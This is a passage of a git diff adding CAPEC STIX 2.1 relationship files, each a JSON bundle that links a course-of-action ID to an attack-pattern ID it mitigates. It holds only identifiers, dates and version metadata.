"2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json new file mode 100644 index 0000000000000000000000000000000000000000..0a34773dd67356c76dd86b5c1e677f61e81a4d65 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--22a16bf0-1ba7-46bc-9499-b58b445e8d79", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "spec_version": "2.1", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json new file mode 100644 index 0000000000000000000000000000000000000000..89d391137fc5b37ce76f487fc84ebf800d928b93 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--83c84a72-905b-4a24-b32e-2ee75a8985fa", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06d27c54-f604-4253-9b67-9e78cfe16886", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json new file mode 100644 index 0000000000000000000000000000000000000000..bf3cfe043204d91a1df05a5b90e7d765fca92a14 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--85550a93-4bc8-4688-8a7e-9c42f9b8b67a", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json new file mode 100644 index 0000000000000000000000000000000000000000..6c00b265c55027ee297c3a64d4a8e3d87ed4ca4e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f6ca1d24-acf5-49e5-9932-b8d45062ab48", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "spec_version": "2.1", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json new file mode 100644 index 0000000000000000000000000000000000000000..7b081df565e9477a6e32f6b772460bd8dad73802 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--46cb291c-90f9-4f2d-8f1c-29674b56953a", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json new file mode 100644 index 0000000000000000000000000000000000000000..b210bbe6643f6f6e75a1c4efedc22c783da41d77 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--676f9d3d-3ece-4e1c-9eeb-957801d9de7f", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0809c5e1-86fc-4df6-8e5e-50939743e745.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0809c5e1-86fc-4df6-8e5e-50939743e745.json new file mode 100644 index 0000000000000000000000000000000000000000..9e0917116e6718d1e4df6a9cce13455b5cc0cf32 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0809c5e1-86fc-4df6-8e5e-50939743e745.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5381cbd9-ba0c-426d-a4f3-160f6573f751", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0809c5e1-86fc-4df6-8e5e-50939743e745", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "spec_version": "2.1", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json new file mode 100644 index 0000000000000000000000000000000000000000..ea60050241f0fbe071b1bd1a5ffd69e367076ab4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c5a5cd49-8868-49dc-bbe8-2fc279a3ceb8", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json new file mode 100644 index 0000000000000000000000000000000000000000..70428862ad8bf3a334506063ab113b96ff03577f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6944167a-950c-48a6-8887-9fac5e4af4c9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json new file mode 100644 index 0000000000000000000000000000000000000000..8a08cbbd5ca898041230aff89252d18ad9ed428c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--356748cd-6be4-4bcd-be7e-dea7e81b65d5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08999418-b2b2-438c-aa9b-95bf0933923b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json new file mode 100644 index 0000000000000000000000000000000000000000..6da59019257f3c15a95d44a1684db7759ec6a8af --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--636a5700-799b-4e48-b850-3dea624f7c6e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a1f65809-af95-4549-8285-b7bac44a07b3", + "spec_version": "2.1", + "target_ref": "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json new file mode 100644 index 0000000000000000000000000000000000000000..b75dc05f87cb8a12f9aef403070a6f24a3d077e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f95e38cd-8224-4c5e-ae13-512cecf32240", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json new file mode 100644 index 0000000000000000000000000000000000000000..11174393c39f38fa261402089e93dd30b5f27d92 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--35e8d949-619f-47ac-b286-e17d2370407e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08eeb157-8c84-4597-82fa-5def0ac9487f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f830ee1-2df0-423a-a566-4e75e0436eb5", + "spec_version": "2.1", + "target_ref": "attack-pattern--51cf3883-1993-49d1-a6c6-169cabf71adb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140.json new file mode 100644 index 0000000000000000000000000000000000000000..0e9364a432357a4d44da925752aeb08f4d832913 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--876685ad-8770-4dd4-8ba9-cb7248747c51", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json new file mode 100644 index 0000000000000000000000000000000000000000..c0252f82b9936b21f6617e712995ebb98cf7693a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5fad1dbf-9068-4495-bae9-4dd539de6225", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09525f40-2e8d-420d-a8ee-3893d36113a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json new file mode 100644 index 0000000000000000000000000000000000000000..3176998a03c272f1ede6930082fc447ced9a14af --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--78648909-19d1-4cd4-823a-9d56e7a24a64", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0989752b-6aa5-43c2-afc2-0873faa1782e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json new file mode 100644 index 0000000000000000000000000000000000000000..6b4defb5889961fd37c606f477da26899a4601e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0993c894-6271-447f-8111-2ee9ee88d8f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cef05ad6-cd90-4580-98e9-80e79c66384e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0993c894-6271-447f-8111-2ee9ee88d8f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c434bad9-76f4-48d5-8bb3-9c46c4c91696", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json new file mode 100644 index 0000000000000000000000000000000000000000..dde03de20eb3d84bea7df591a16e480163cc8934 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09b1f116-7e91-47fc-8238-758d20861790.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--50abfbc3-7e74-40c8-b7c9-e9a47f584f5f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09b1f116-7e91-47fc-8238-758d20861790", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "spec_version": "2.1", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json new file mode 100644 index 0000000000000000000000000000000000000000..d50f32713eab8d54cdd485f158c0c852a410a7da --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--8775737c-b5ec-40b0-a6b9-5a47a2a27cc1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "spec_version": "2.1", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json new file mode 100644 index 0000000000000000000000000000000000000000..f5db54d482429aa26403df579a8c6d7f8b4db84b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a8933892-2042-44a3-91fa-0e5d7acda24e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json new file mode 100644 index 0000000000000000000000000000000000000000..c2f8a7390a376598465963e921e57a84f0e349cf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b77fc97d-ba82-4d16-9022-d5869b69b662", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json new file mode 100644 index 0000000000000000000000000000000000000000..610906c20909132f4ee8c65a0d8daa670864f08c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b609b9c-0b10-497b-b953-c1d279689017.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--48a0347b-8377-4dcd-94cf-66fcdb8d0e84", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b609b9c-0b10-497b-b953-c1d279689017", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json new file mode 100644 index 0000000000000000000000000000000000000000..d32c3ca883baf62c08ca0ae5fea8045ec9089b9a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f12d3758-c2b9-41c5-9e70-cf4351531c36", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "spec_version": "2.1", + "target_ref": 